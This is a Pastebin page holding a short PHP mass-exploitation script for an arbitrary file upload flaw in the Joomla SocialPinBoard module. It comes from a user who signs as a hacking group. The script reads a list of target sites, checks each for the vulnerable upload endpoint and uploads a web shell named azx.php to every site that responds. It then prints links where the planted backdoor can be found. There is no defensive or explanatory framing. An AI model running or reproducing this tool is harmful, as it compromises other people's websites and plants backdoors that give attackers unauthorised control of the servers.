Advertisement
AZZATSSINS_CYBERSERK

Joomla socialpinboard AFU

Jun 23rd, 2017
281
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.12 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. @ini_set('display_errors', 0);
  4. /*
  5. AZZATSSINS
  6. XaiSyndicate
  7. azx.php change to ur name shell
  8. */
  9. echo "
  10. <title>Joomla SocialPinBoard</title><center><body bgcolor=silver><form method='post'><textarea style='width: 450px; height: 150px;color:red;background:silver;'' name='sites'></textarea><br><input style='color:red;background:silver;' type='submit' name='go' value='Submit' style='width: 450px;'>
  11.         </form><br>";
  12. $sites = explode("\r\n", $_POST['sites']);
  13. if($_POST['go']){
  14. foreach($sites as $site){
  15. $url = $site."/modules/mod_socialpinboard_menu/saveimagefromupload.php";
  16. $ch = curl_init($url);
  17. curl_setopt($ch, CURLOPT_NOBODY, true);
  18. curl_exec($ch);
  19. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  20. curl_close($ch);
  21. if($status_code==200)
  22. {
  23. echo "<br><hr><br><font color=green> Vuln : ".$url." </font><br><br>";
  24. system("curl -F uploadfile=@azx.php ".$url);
  25. echo "<br><a href='".$site."/modules/mod_socialpinboard_menu/images/socialpinboard/temp/'>Ceck backdoor with random name in dir</a><br>";
  26. }else{
  27.  echo "<br><hr><br><font color=red> Not Vuln ".$site."</font><br>"; }
  28. curl_close($ch);
  29. }}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement